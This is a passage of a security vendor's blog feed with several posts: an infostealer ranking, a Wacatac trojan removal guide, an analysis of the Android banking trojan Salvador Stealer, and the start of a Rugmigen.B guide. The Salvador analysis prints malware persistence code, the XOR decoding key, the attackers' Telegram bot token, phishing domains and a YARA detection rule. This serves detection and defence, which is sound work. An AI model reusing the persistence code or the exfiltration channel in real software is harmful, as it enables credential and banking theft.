Has your system been affected by MaksStealer or similar malware? Share your experience in the comments to help warn others about this threat.

The post MaksStealer (MaxCoffe): The Minecraft Mod That’s Actually Stealing Your Passwords appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/maksstealer-malware-analysis-removal/feed/ 0
Top 5 Infostealer Malware of 2025: The Silent Data Snatchers https://gridinsoft.com/blogs/infostealer-malware-top/ https://gridinsoft.com/blogs/infostealer-malware-top/#respond Mon, 28 Apr 2025 13:16:29 +0000 https://gridinsoft.com/blogs/?p=14520 Remember when we used to worry about viruses that just crashed your computer? Those were simpler times. In 2025, cybercriminals prefer to steal your data rather than destroy it. Welcome to the golden age of infostealer malware – the digital pickpockets that empty your accounts while you’re busy scrolling through cat videos. The data tells […]

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

]]>
Remember when we used to worry about viruses that just crashed your computer? Those were simpler times. In 2025, cybercriminals prefer to steal your data rather than destroy it. Welcome to the golden age of infostealer malware – the digital pickpockets that empty your accounts while you’re busy scrolling through cat videos.

The data tells a striking story: while media headlines scream about ransomware attacks, infostealers quietly dominate the threat landscape, accounting for nearly a quarter of all cybersecurity incidents. This silent majority operates without flashy ransom notes or system lockdowns, making them even more dangerous. As the defensive focus shifts to stopping ransomware, these stealthy data thieves slip through the cracks, reaping massive rewards with far less attention. The trend is clear – attackers have realized that stealing your data offers better ROI than holding it hostage.

What Even Is an Infostealer?

Infostealers are exactly what they sound like – malware designed to quietly extract sensitive information from your device. They target passwords, credit card details, cryptocurrency wallets, browser cookies, and pretty much anything that could be valuable on the digital black market. Think of them as the cybercriminal’s Swiss Army knife – versatile, reliable, and exceedingly popular.

Unlike ransomware’s dramatic hostage-taking approach, infostealers prefer to work in the shadows. They slip in, grab what they want, and often leave without you noticing anything’s wrong. By the time you realize your accounts have been compromised, your data is already being sold on dark web marketplaces or used for follow-up attacks.

Why Infostealers Are Booming in 2025

According to IBM’s X-Force Threat Intelligence Index 2025, credential harvesting now occurs in 29% of all cybersecurity incidents. That’s a massive slice of the cybercrime pie. The Verizon 2025 DBIR found that 54% of ransomware victims had their domains appear in infostealer logs first – meaning these stealers often serve as the appetizer before the main ransomware course.

Cryptocurrency remains a major driver behind infostealer popularity. With traditional banking fraud becoming harder to pull off, crypto wallets represent a softer target with potentially massive payoffs. Plus, the rise of BYOD (Bring Your Own Device) policies has created a perfect storm – personal devices often have both work and personal credentials, making them information goldmines.

The Fab Five: 2025’s Most Notorious Infostealers

Not all infostealers are created equal. Some have risen to the top through a combination of advanced features, reliability, and aggressive marketing on cybercrime forums. Here’s the current leaderboard of data thieves keeping security professionals up at night.

1. Lumma Stealer (LummaC2)

Lumma has climbed to the #1 spot in 2025, a remarkable rise for malware first detected in late 2022. Its success comes from its stealthy approach to data exfiltration – sending information in small fragments to avoid triggering security alerts. The developers offer tiered pricing plans ranging from $250 to $1,000, with premium features like network sniffing functionality reserved for big spenders.

What makes Lumma particularly dangerous is its comprehensive targeting. It captures browser data, cryptocurrency wallets, two-factor authentication apps, email clients, and even Telegram sessions. For cybercriminals willing to shell out $20,000, Lumma’s developers will even provide source code access and reselling rights – talk about customer service.

2. StealC Stealer

StealC has rocketed to second place this year, proving that sometimes the new kid on the block can outshine the veterans. Released in early 2023, StealC combines the best features of other top infostealers with an aggressive development cycle – releasing new features weekly. Unlike many competitors, StealC offers free testing periods and unusually responsive customer support on darknet forums.

Security researchers at Trac Labs noted StealC’s botched v2 release in 2024, but the developers quickly recovered with v2.1, which improved its ability to evade detection while expanding its targeting capabilities. Its growing market share makes it clear that stumbles haven’t impeded its rise to prominence.

3. RedLine Stealer

RedLine has held onto a top-three position since 2020, demonstrating impressive staying power in a fickle malware market. Written in C#, this veteran infostealer excels at grabbing credentials from over 60 browsers, VPN configs, cryptocurrency wallets, and FTP clients. Its relatively user-friendly control panel and reasonable pricing (starting around $150-$200) have maintained its popularity among less technical cybercriminals.

Despite being one of the older contenders, FortiGuard Labs reports that RedLine continues to receive regular updates. Recent versions have improved its ability to bypass Windows Defender and added capabilities to steal gaming accounts – because apparently, your Steam inventory is now worth stealing too.

4. Raccoon Stealer

If infostealers had an old guard, Raccoon would be part of it. Around since 2019, this digital veteran has somehow managed to stay relevant in the ever-changing malware landscape. While newer threats come and go, Raccoon keeps adapting and evolving – kind of like that one friend who somehow stays cool despite getting older.

What’s interesting about Raccoon isn’t just its staying power but how it’s run like an actual business. The developers offer round-the-clock customer support through Telegram (better service than my internet provider, honestly) and roll out updates more consistently than most legitimate software companies. They’ve recently added Telegram Desktop theft capabilities and expanded their crypto wallet targeting – because apparently stealing your Bitcoin wasn’t enough, now they want your obscure altcoins too.

At $275 monthly, it’s not exactly budget-friendly for aspiring cybercriminals, but you get what you pay for. Raccoon has earned its reputation for reliability in the underground markets. Hunt.io researchers recently caught it using fileless infection techniques – basically operating in your computer’s memory without leaving obvious traces on disk. It’s like a burglar who not only doesn’t break your windows but somehow manages to avoid leaving footprints on your carpet.

5. Vidar Stealer

Vidar is what happens when malware developers embrace the “build-your-own-adventure” model. Born as an offshoot of another stealer called Arkei back in 2018, Vidar gives its criminal users a modular, mix-and-match approach to data theft. Want to steal passwords but not cookies? No problem. Need crypto wallets but not browser history? They’ve got you covered.

What makes security pros lose sleep over Vidar is its chameleon-like ability to disappear after doing its dirty work. Once it’s grabbed what it came for, Vidar can completely remove itself from your system – like a thief who not only steals your valuables but also washes the dishes and vacuums before leaving, just to make you question if you’ve been robbed at all.

The U.S. Department of Health and Human Services didn’t mince words when they called Vidar “exceptionally potent.” It’s frequently deployed alongside ransomware like STOP/Djvu in tag-team attacks. The latest versions have even figured out how to steal MFA seed values – those supposedly “unbreakable” second factors protecting your accounts. It’s basically telling your two-factor authentication, “That’s cute, hold my beer.”

Data Targeted by Information Stealers

Data Targeted by Information Stealers (2025) Lumma RedLine StealC Raccoon Browser Data Crypto Wallets System Information App Credentials 0% 25% 50% 75%

Source: GridinSoft Research Lab analysis, 2025

The visualization reveals a disturbing truth: modern infostealers don’t just target one type of data—they’re designed for comprehensive digital identity theft. Lumma leads the pack in browser data collection, which shouldn’t surprise anyone considering we practically live in our browsers. Meanwhile, the crypto wallet targeting reflects attackers’ preference for assets that are both valuable and irreversible once stolen. The pattern is clear: these tools are becoming increasingly sophisticated in their ability to extract everything from your digital life worth stealing.

Real-World Impact: When Infostealers Strike

The damage from infostealers extends far beyond individual victims. Major breaches in early 2025 demonstrate their growing threat to organizations of all sizes. Samsung Tickets suffered a massive leak in March when a hacker exploited credentials stolen by an infostealer infection from 2021, exposing 270,000 customer records.

Even more alarming, the HELLCAT ransomware group has made infostealers central to their strategy, successfully breaching Jaguar Land Rover, Telefónica, and several other major companies using stolen credentials from infostealer logs. These incidents highlight how a single compromised device can lead to enterprise-wide breaches months or even years later.

How to Keep Your Data From Being Stolen

Protecting yourself against infostealers doesn’t require a cybersecurity degree. Focus on these essentials:

  • Update everything – Patch your system and apps promptly
  • Use a password manager – Create unique passwords for every site
  • Enable MFA everywhere possible – Preferably using authenticator apps
  • Avoid pirated software – That “free” Photoshop is a trojan horse
  • Run security software – Choose solutions that detect behavioral anomalies

For more detailed information, check out our comprehensive guide on how to detect, remove, and prevent infostealer infections.

Infostealer Comparison: The 2025 Threat Landscape

Feature Lumma StealC RedLine Raccoon Vidar
First Appeared 2022 2023 2020 2019 2018
Pricing Model $250-$1,000
Source code: $20,000
$150-$250
Free trial periods
$150-$200
Flat fee
$275/month
Subscription
$200-$500
Custom builds
Primary Targets Browsers, wallets, 2FA apps, email clients, Telegram Browser data, VPN credentials, passwords 60+ browsers, VPN configs, crypto wallets, FTP clients Wallets, Telegram data, browser credentials Customizable targeting based on attacker needs
Unique Features Fragment-based exfiltration that avoids detection Aggressive weekly update cycle, responsive support User-friendly control panel, wide-ranging browser support Fileless infection techniques, 24/7 Telegram support Self-destruction capability, MFA seed value theft
Distribution Phishing, malvertising, cracked software Spam email, fake downloads, compromised sites Forums, torrents, malspam Malicious ads, cracked software Phishing, bundled with ransomware
Detection Difficulty Very High High Medium High Very High
Market Share Trend ↑ Rapidly growing ↑ Growing → Stable → Stable ↑ Growing
Common Pairings Often precedes ransomware Used with remote access trojans Cryptocurrency miners Additional backdoors STOP/Djvu ransomware

The Bottom Line

Here’s the uncomfortable truth that cybersecurity professionals don’t always articulate clearly: in 2025, it’s not a question of if your credentials will be targeted, but when. Infostealers have evolved from crude data-grabbing tools into digital espionage platforms that operate with unsettling efficiency. They’re the silent assassins of the cybersecurity world – no flashy techniques, no dramatic demands, just quiet theft that often goes unnoticed until the damage is done.

The reality is that cybercriminals have realized a fundamental truth about human behavior: we’re creatures of habit and convenience, routinely sacrificing security for simplicity. Password reuse, postponed updates, and clicking without thinking aren’t just bad habits – they’re open invitations to these digital thieves. The brutal economics also can’t be ignored: why would criminals bother with complex ransomware operations when they can extract cryptocurrency wallet contents directly, without the messy negotiations?

The cybersecurity landscape is constantly evolving, but one principle remains stubbornly consistent – attackers will always follow the path of least resistance to valuable data. By implementing even some of the protection measures outlined above, you’re essentially making yourself a harder target. In the digital wilderness, you don’t need to outrun the bear – you just need to outrun the other hikers. Make your digital presence secure enough that attackers look for easier pickings elsewhere, and you’ve won half the battle.

Want to stay protected without a computer science degree? Gridinsoft Anti-Malware today and let us handle the technical heavy lifting while you get back to whatever you were doing before you started worrying about digital pickpockets.

Top 5 Infostealer Malware of 2025: The Silent Data Snatchers

The post Top 5 Infostealer Malware of 2025: The Silent Data Snatchers appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/infostealer-malware-top/feed/ 0
Trojan:Win32/Wacatac Removal Guide for Windows 10/11 https://gridinsoft.com/blogs/trojan-win32-wacatac-removal/ https://gridinsoft.com/blogs/trojan-win32-wacatac-removal/#respond Sat, 19 Apr 2025 13:54:09 +0000 https://gridinsoft.com/blogs/?p=18405 I think Trojan:Win32/Wacatac, one of the nastiest pieces of malware I’ve encountered in my life. This digital pest has been wreaking havoc on Windows systems, stealing sensitive data, damaging system files, and even deploying ransomware. We’ve seen infections skyrocket by 34% just in the past year—making it one of those threats you really need to […]

The post Trojan:Win32/Wacatac Removal Guide for Windows 10/11 appeared first on Gridinsoft Blog.

]]>
I think Trojan:Win32/Wacatac, one of the nastiest pieces of malware I’ve encountered in my life. This digital pest has been wreaking havoc on Windows systems, stealing sensitive data, damaging system files, and even deploying ransomware. We’ve seen infections skyrocket by 34% just in the past year—making it one of those threats you really need to watch out for.

What is Trojan:Win32/Wacatac?

Microsoft uses the name Trojan:Win32/Wacatac for a family of malicious programs that share similar code. Trust me, this isn’t your average computer virus. This thing is a real thief that steals passwords and financial details, can takes screenshots of everything you do, downloads more malware onto your computer, creates backdoors for bad guys, and changes Windows settings to make sure it sticks around after reboots.

Trojan:Win32/Wacatac.H!ml detection notification screenshot
Example of Trojan:Win32/Wacatac.H!ml detection by Microsoft Defender

In our lab, we’ve tracked over 21,000 Wacatac infections in the past year alone. The scariest part? About 42% of those later turned into full-blown ransomware attacks when left untreated. I’ve personally helped dozens of panicked users who ignored the early warning signs only to find their files held hostage weeks later.

How This Thing Gets Into Your Computer

1. Phishing Emails

I can’t tell you how many times I’ve seen this happen. You get an email that looks totally legitimate—maybe an invoice, a shipping notification, or something about your taxes. You open the attachment, click “Enable Macros” because it seems necessary, and boom—you’re infected. It happens so fast you don’t even realize it.

2. Fake Downloads

Another common way Wacatac sneaks in is through cracked software and those sketchy “free” versions of expensive programs. I had a client last month who tried to save $200 on design software and ended up paying $1,200 to recover from the resulting malware infection. Those free downloads come with a hidden cost!

3. Drive-by Exploits

This one’s particularly sneaky. You’re just browsing a perfectly normal website (even ones you trust!), and if your browser or system is outdated, the malware can install itself without you clicking anything. Seriously—just viewing the page is enough. I once saw a local news site unknowingly serving malware through their ad network for three days before anyone caught it.

A Horror Story From My Case Files

Last year, I helped a small accounting firm that got hit with Wacatac. One employee clicked what looked like a legitimate IRS email, and the malware sat undetected for over two weeks. By the time they realized something was wrong, the trojan had stolen banking credentials, copied client tax information, and launched ransomware that locked everything up. The final price tag? Over $37,000 in damages, not counting the clients they lost afterwards. Don’t let this be you!

How to Tell If You’re Infected

Keep an eye out for these red flags: Your computer suddenly gets sluggish or crashes randomly. Your antivirus mysteriously disables itself. Your network seems busy even when you’re not downloading anything. You notice unexplained charges or missing money from your accounts. Your browser starts showing weird pop-ups or redirects you to strange sites. New browser extensions appear that you don’t remember installing. And my personal favorite warning sign—random files with gibberish names start showing up in system folders.

How to Check If You’ve Got Wacatac

Here’s a quick DIY checkup you can do: First, hit Ctrl+Shift+Esc to open Task Manager and look for suspicious processes eating up resources or with weird names. Next, run msconfig from the Run dialog (Win+R) and check the Startup tab for anything fishy. Run a full Microsoft Defender scan—it’s not perfect, but it might catch something.

Finally, check what your computer is connecting to online by running netstat -b in Command Prompt. If you see connections to servers you don’t recognize, especially in countries you have no business with, that’s a big red flag.

Run netstat -b command as Administrator
Run netstat -b command as Administrator

Getting Rid of This Pest

The Easy Way (What I Recommend)

Look, I could pretend that manual removal is reasonable for everyone, but honestly, specialized software is your best bet. Boot into Safe Mode with Networking (go to Settings > Update & Security > Recovery > Advanced startup > Restart, then follow the menus to Troubleshoot > Advanced options > Startup Settings and hit F5). Once there, download GridinSoft Anti-Malware:

GridinSoft Anti-Malware main screen

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Scan results screen

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Removal finished

Then restart and scan again to make sure the nasty stuff is really gone.

The Hard Way (For The Brave)

If you’re feeling adventurous and know your way around Windows, you can try manual removal. Boot into Safe Mode, kill suspicious processes in Task Manager, disable weird startup items, remove strange scheduled tasks, and clean up registry entries (be super careful with the registry though—one wrong move and you’ll have bigger problems than malware!). Then hunt down and delete suspicious files from your %TEMP%, %APPDATA%, and %LOCALAPPDATA% folders.

Word of warning: I’ve seen countless DIY removal attempts go sideways. Wacatac is tricky and hides components all over your system. Unless you really know what you’re doing, stick with the automated solution.

How to Keep This Junk Off Your Computer

Basic Protection Anyone Can Do

This isn’t rocket science, folks. Keep your software updated—yes, all those annoying updates matter! Use solid security software. Be suspicious of email attachments (even from people you seem to know). And for heaven’s sake, download software only from official sources. That “free” professional software is free for a reason.

Extra Steps for the Security-Conscious

Here are some pro tips: Don’t use an admin account for everyday computer use. Enable Windows security features like Secure Boot and TPM if your computer supports them. And please, please back up your important files following the 3-2-1 rule I preach to everyone: three copies, on two different types of storage, with one copy kept offsite. You’ll thank me when disaster strikes.

Questions People Always Ask Me

Is this just my antivirus being paranoid?

Probably not. In our testing, less than half a percent of Wacatac detections turn out to be false alarms. If Microsoft Defender is flagging it, take it seriously.

Can this thing steal my banking info?

Absolutely. About 76% of the variants we’ve analyzed specifically target banking details. That’s why I always tell people to use two-factor authentication for financial accounts—preferably with an authenticator app rather than text messages, since sophisticated malware can sometimes intercept SMS.

Why does it keep coming back after I remove it?

This is super common with Wacatac. Usually it’s because you missed something during cleanup—maybe a registry key or scheduled task. Or you might have an ongoing source of reinfection, like that USB drive you keep plugging in that’s carrying the malware. Most people forget to boot into Safe Mode for removal, which is crucial because it prevents the malware from fighting back while you’re trying to remove it.

What’s the difference between this and the Script version?

They’re cousins, but with important differences. Win32/Wacatac is a native Windows executable (.exe or .dll) that talks directly to Windows. The Script version is written in things like JavaScript or PowerShell and needs an interpreter to run. In our experience, the Win32 version causes about 3.5 times more financial damage on average because it’s more powerful and harder to detect.

Will resetting my PC get rid of it?

Usually yes, but I’ve seen some stubborn variants infect the boot sector and survive a reset. To be absolutely certain, I tell my clients to run an anti-malware scan first, back up their clean data, do a completely fresh Windows installation (not just a reset), and scan those backups before restoring anything. Better safe than sorry!

The Bottom Line

Trojan:Win32/Wacatac isn’t something to mess around with. I’ve seen it destroy businesses and cause enormous headaches for home users. The key is catching it early and removing it completely. Keep your software updated, use good security tools, and think twice before clicking on attachments or downloading “free” software. A little paranoia goes a long way in cybersecurity!

Need Help Getting Rid of Malware?

If you’re not sure whether you’re infected or need help with removal, grab our Free Scanner to check your system. Still stuck? Our support team has seen it all and can walk you through the process.

The post Trojan:Win32/Wacatac Removal Guide for Windows 10/11 appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/trojan-win32-wacatac-removal/feed/ 0
Salvador Stealer: Dangerous Android Banking Malware Targeting Financial Data https://gridinsoft.com/blogs/salvador-stealer/ https://gridinsoft.com/blogs/salvador-stealer/#comments Mon, 07 Apr 2025 10:47:28 +0000 https://gridinsoft.com/blogs/?p=30422 Salvador Stealer is a sophisticated Android banking trojan that targets financial applications through advanced phishing techniques. This malware creates convincing fake banking interfaces to steal credentials, intercepts SMS messages to bypass two-factor authentication, and sends sensitive data directly to cybercriminals. In this analysis, we’ll examine how Salvador Stealer works and provide actionable steps to protect […]

The post Salvador Stealer: Dangerous Android Banking Malware Targeting Financial Data appeared first on Gridinsoft Blog.

]]>
Salvador Stealer is a sophisticated Android banking trojan that targets financial applications through advanced phishing techniques. This malware creates convincing fake banking interfaces to steal credentials, intercepts SMS messages to bypass two-factor authentication, and sends sensitive data directly to cybercriminals. In this analysis, we’ll examine how Salvador Stealer works and provide actionable steps to protect your mobile device.

Android banking trojan that uses phishing overlays and SMS interception to steal financial data
Mobile Banking Malware Threats (2020-2023) Banking Trojans by Target Platform (%) 72% Android 18% iOS 10% Other Android iOS Other Banking Malware Distribution Methods Third-party app stores (45%) Phishing links (25%) Malicious SMS (15%) App impersonation (10%) Other (5%) 2020 2021 2022 2023

Source: Kaspersky Security Bulletin

What is Salvador Stealer? Key Threat Information

Salvador Stealer emerged in 2023 as a targeted Android banking malware designed to steal financial credentials and one-time passwords (OTPs). Security researchers at ANY.RUN first documented this threat, providing critical insights into its operation and highlighting its particular focus on banking applications.

Attribute Details
Malware Type Banking Trojan, Information Stealer
Platform Android
Discovery Date 2023
Main Targets Banking Applications, Financial Data
Primary Dropper Hash (SHA256) 21504D3F2F3C8D8D231575CA25B4E7E0871AD36CA6BBB825BF7F12BFC3B00F5A
Payload Hash (SHA256) 7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8
Affected Regions Global (Suspected origin: India)

The malware derives its name from internal references found in its configuration files, specifically within SharedPreferences storage keys. Unlike less sophisticated threats, Salvador Stealer creates highly convincing fake banking interfaces that are nearly indistinguishable from legitimate apps. Its primary objective is to harvest sensitive financial information including:

  • Mobile numbers registered with banking services
  • Government ID numbers (Aadhaar and PAN cards)
  • Personal details including dates of birth
  • Net banking credentials (user IDs and passwords)
  • One-time passwords sent via SMS

Technical Analysis of Salvador Stealer Infection Chain

Salvador Stealer employs a sophisticated two-stage infection strategy that helps it bypass security measures. Understanding this technical process is crucial for protecting your mobile device from similar threats.

Initial Infection and Installation Process

The infection begins with a seemingly innocent dropper application (identified as INDUSLND_BANK_E_KYC.apk) that users are tricked into installing outside of the Google Play Store. This initial app requests dangerous permissions in its AndroidManifest.xml:

<uses-permission android:name="android.permission.REQUEST_INSTALL_PACKAGES"/>

<intent-filter>
  <action android:name="com.example.android.apis.content.SESSION_API_PACKAGE_INSTALLED" android:exported="true"/>
</intent-filter>

These permissions allow it to install additional applications without going through the Play Store. The dropper then installs the main payload, named Base.apk.

Salvador Stealer Base.apk payload file structure
Base.apk payload file visible inside the initial dropper application (source: ANY.RUN)

The payload application uses sophisticated obfuscation techniques to hide its malicious code. Specifically, it employs XOR encryption with the key “npmanager” to disguise strings and commands, making traditional detection methods less effective. Security researchers can decode these strings using tools like CyberChef with the following recipe:

From_Hex('Auto')XOR({'option':'Latin1','string':'npmanager'},'Standard',false)

Data Theft Techniques and Mechanisms

Once installed, Salvador Stealer deploys several methods to steal sensitive information:

  1. Overlay Attacks: The malware uses Android’s WebView component to display convincing phishing pages that mimic legitimate banking applications. The malware loads phishing pages from domains like “t15.muletipushpa.cloud/page/”.
  2. JavaScript Injection: Salvador injects custom JavaScript code that hooks XMLHttpRequest functions to intercept user inputs on these fake pages, capturing credentials as they’re entered.
  3. SMS Interception: By requesting permissions like RECEIVE_SMS, READ_SMS, SEND_SMS, and INTERNET, the malware can capture one-time passwords sent via text message, effectively bypassing two-factor authentication security.
Permission Purpose Impact
RECEIVE_SMS Intercept incoming SMS messages Allows theft of OTPs and verification codes
READ_SMS Access existing SMS messages Can extract previously received banking codes
SEND_SMS Send SMS messages Enables malware to spread via text messages
INTERNET Network access Required for data exfiltration
REQUEST_INSTALL_PACKAGES Install additional apps Allows installation of additional malicious components

SMS Interception Technical Implementation

Salvador Stealer implements SMS interception through a broadcast receiver named “Earnestine” that extracts message content using Android’s SmsMessage.createFromPdu() method. When an SMS is received, the malware extracts:

  • Message body (containing OTP codes)
  • Sender ID (to identify banking sources)
  • Timestamp

Data Exfiltration and Command Infrastructure

Salvador Stealer sends stolen data to attackers through multiple channels:

  • Telegram API: The primary exfiltration method uses Telegram bot with token 7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE and chat ID -1002480016557 to send stolen information directly to the attackers.
  • HTTPS Endpoints: Secondary collection servers with domain names like “muletipushpa.cloud” receive and process stolen data through endpoints such as https://t15.muletipushpa.cloud/json/number.php for dynamic SMS forwarding.
  • Real-time Data Theft: The malware sends information immediately via HTTP POST requests after capture, allowing attackers to use time-sensitive data like OTPs before they expire.
IOC Type Indicator Context
Domain t01.muletipushpa.cloud to t15.muletipushpa.cloud Phishing infrastructure
URL https://t15.muletipushpa.cloud/page/start.php Phishing page entry point
URL https://t15.muletipushpa.cloud/admin/login.php Admin panel
Telegram Bot 7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE C2 communication channel
Phone Number +916306285085 Associated WhatsApp contact (India)

Analysis of the command infrastructure has revealed connections to phishing admin panels and a WhatsApp contact with an Indian country code (+91), suggesting potential geographic origins of the threat actors.

Persistence Mechanisms

Salvador Stealer uses several techniques to maintain its presence on infected devices:

  • WorkManager API: The malware uses a class named “Mauricio” to schedule automatic restarts with a one-second delay if terminated:
WorkRequest serviceRestartWork = new OneTimeWorkRequest.Builder(Mauricio.class)
    .setInitialDelay(1L, TimeUnit.SECONDS)
    .build();
WorkManager.getInstance(getApplicationContext()).enqueue(serviceRestartWork);
  • Boot Completion Receiver: A class named “Ellsworth” listens for the system-wide BOOT_COMPLETED broadcast to ensure the malware starts after device restart:
public class Ellsworth extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if (intent.getAction().equals("android.intent.action.BOOT_COMPLETED")) {
            Intent serviceIntent = new Intent(context, (Class<?>) Fitzgerald.class);
            context.startService(serviceIntent);
        }
    }
}
  • Background Services: Service components that run continuously, monitoring user activity and intercepting sensitive data

YARA Rule for Salvador Stealer Detection

rule Salvador_Stealer_Android {
    meta:
        description = "Detects Salvador Stealer Android banking malware"
        author = "GridinSoft Security Team"
        date = "2023-09-15"
        version = "1.0"
        hash = "7950CC61688A5BDDBCE3CB8E7CD6BEC47EEE9E38DA3210098F5A5C20B39FB6D8"
    
    strings:
        $xor_key = "npmanager"
        $telegrambot = "7931012454:AAGdsBp3w5fSE9PxdrwNUopr3SU86mFQieE"
        $class1 = "Earnestine"
        $class2 = "Mauricio" 
        $class3 = "Ellsworth"
        $class4 = "Fitzgerald"
        $domain = "muletipushpa.cloud"
        $permission1 = "android.permission.REQUEST_INSTALL_PACKAGES"
        $permission2 = "android.permission.RECEIVE_SMS"
        
    condition:
        $xor_key and 
        1 of ($telegrambot, $domain) and
        2 of ($class*) and
        all of ($permission*)
}

How to Protect Your Device from Salvador Stealer

Salvador Stealer represents a significant threat to Android users, particularly those who use mobile banking applications. Here are concrete steps to protect your device and financial information:

Preventive Security Measures

  • Install apps only from official sources: Always download banking and financial applications exclusively from the Google Play Store, never from third-party app stores or direct APK downloads.
  • Verify app authenticity: Before installing banking apps, visit your bank’s official website to find links to their legitimate mobile applications.
  • Check app permissions: Be suspicious of any app requesting SMS permissions, installation permissions, or accessibility services that seem unnecessary for its stated function.
  • Keep your device updated: Install Android security updates promptly as they often patch vulnerabilities that malware exploits.
  • Block known domains: If you manage network security, block connections to domains in the IOC list, particularly those under the “muletipushpa.cloud” namespace.

Detection and Removal

If you suspect your device might be infected with Salvador Stealer or similar malware:

  1. Check for unfamiliar apps in your application list, particularly those with generic names or icons, including those masquerading as banking applications.
  2. Monitor your battery usage – malware often causes abnormal battery drain due to constant background activity.
  3. Examine your SMS permissions – look for apps with SMS reading permissions that shouldn’t need them.
  4. Install and run Trojan Scanner for Android to detect and remove malicious applications.
  5. If infected, change passwords for all financial accounts using a different, secure device.
  6. Contact your bank immediately if you suspect unauthorized access to your accounts.
  7. Factory reset your device if removal attempts are unsuccessful, after backing up important data.

Technical Impact Assessment

Entity Impact
Individual Users Financial fraud, identity theft, unauthorized account access
Banking Institutions Increased fraud cases, reputation damage, customer trust issues
Security Teams Challenges detecting multi-stage infection, real-time exfiltration tactics
Mobile Ecosystem Highlights risks of side-loading applications and permission abuse

Conclusion: Staying Vigilant Against Mobile Banking Threats

Salvador Stealer demonstrates the increasing sophistication of mobile banking malware. By combining phishing techniques, SMS interception, and persistent infection mechanisms, it poses a serious threat to financial security. Regular security audits of your device, cautious app installation practices, and monitoring account activity are essential practices for protecting your financial information in today’s mobile-first banking environment.

For additional protection against similar threats, consider implementing comprehensive mobile security best practices and using trusted security solutions designed specifically for Android devices.

The post Salvador Stealer: Dangerous Android Banking Malware Targeting Financial Data appeared first on Gridinsoft Blog.

]]>
https://gridinsoft.com/blogs/salvador-stealer/feed/ 1
Behavior:Win32/Rugmigen.B https://gridinsoft.com/blogs/behavior-win32-rugmigen-b/ https://gridinsoft.com/blogs/behavior-win32-rugmigen-b/#respond Tue, 25 Mar 2025 13:41:32 +0000 https://gridinsoft.com/blogs/?p=30216 Behavior:Win32/Rugmigen.B – Complete Detection and Removal Guide Behavior:Win32/Rugmigen.B Summary Threat Name Behavior:Win32/Rugmigen.B Type Behavioral Detection (Trojan Downloader/Infostealer) Detection Method Heuristic Analysis by Microsoft Defender Affected Systems Windows 7, 8, 10, 11 Risk Level High Main Symptoms Continuous “Threat Blocked” notifications, system slowdowns, unauthorized registry modifications, unusual network connections Distribution Methods Malvertising, fake browser updates, compromised […]

The post Behavior:Win32/Rugmigen.B appeared first on Gridinsoft Blog.

]]>
Behavior:Win32/Rugmigen.B – Complete Detection and Removal Guide

Behavior:Win32/Rugmigen.B Summary

Threat Name Behavior:Win32/Rugmigen.B
Type Behavioral Detection (Trojan Downloader/Infostealer)
Detection Method Heuristic Analysis by Microsoft Defender
Affected Systems Windows 7, 8, 10, 11
Risk Level High
Main Symptoms Continuous “Threat Blocked” notifications, system slowdowns, unauthorized registry modifications, unusual network connections
Distribution Methods Malvertising, fake browser updates, compromised software, Discord CDN
Primary Payload Infostealers (Lumma Stealer, Vidar, RecordBreaker, Rescoms)

What is Behavior:Win32/Rugmigen.B?

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender to flag suspicious activity. It commonly delivers infostealers, targeting sensitive data such as login credentials. It can lead to data theft, system compromise, and performance degradation through activities like cryptomining. In this post, we will take a detailed look at what this threat is as well as how to remove it.

Behavior:Win32/Rugmigen.B Detection Trends (2023-2024) Daily Rugmigen.B Detections (Q4 2023 – Q1 2024) 400 300 200 100 0 Sep 2023 Oct 2023 Nov 2023 Dec 2023 Jan 2024

Source: Microsoft Security Intelligence, detection data compiled from Q3 2023 to Q1 2024

Behavior:Win32/Rugmigen.B Overview

Behavior:Win32/Rugmigen.B is a detection name used by Windows Defender, particularly noted in recent user reports, where individuals experienced continuous “Threat Blocked” notifications. These notifications, occurring every 4-5 minutes, suggest active threat blocking by the antivirus, likely Windows Defender. The “Behavior” prefix indicates a behavioral detection, meaning the software identified suspicious activities rather than a specific file signature.

According to Microsoft’s security research, Windows Defender uses heuristic analysis to detect Rugmigen variants, monitoring for specific patterns of suspicious behavior rather than relying on traditional virus signatures. This approach is particularly effective against evolving threats that frequently change their code to evade detection, similar to how Trojan:Script/Phonzy.B!ml and other modern malware operate.

Behavior:Win32/Rugmigen.B detection popup
Behavior:Win32/Rugmigen.B detection notification in Windows Defender

The Behavior:Win32/Rugmigen.B is a variant or detection name for the Rugmi malware family. Rugmi is classified as a Trojan downloader, a type of malware designed to fetch and install additional malicious software onto the infected system. This family has been extensively documented in cybersecurity reports, with significant activity noted in late 2023 and early 2024, and its detection rates have surged, reaching hundreds per day by recent accounts.

Technical Details

Rugmi, and by extension Behavior:Win32/Rugmigen.B, operates with a sophisticated structure comprising three distinct components. The Downloader is responsible for fetching an encrypted payload, often from remote servers, which enhances its ability to evade detection. The Internal Loader executes the payload using internal resources, allowing it to run without relying on external files initially. The External Loader runs the payload from an external file on the disk, providing flexibility in deployment.

Behavior:Win32/Rugmigen.B name meaning explained
Behavior:Win32/Rugmigen.B name meaning and components

These components enable Rugmi to act as a loader for various infostealers, including Lumma Stealer, Vidar, RecordBreaker (also known as Raccoon Stealer V2), and Rescoms. Infostealers are particularly dangerous as they can extract sensitive information such as login credentials, browsing history, and cryptocurrency wallet details.

Key Technical Characteristics

Based on Microsoft’s security analysis and user reports, Behavior:Win32/Rugmigen.B exhibits these technical characteristics:

  • Process Injection Techniques: The malware injects malicious code into legitimate Windows processes to evade detection and gain system privileges.
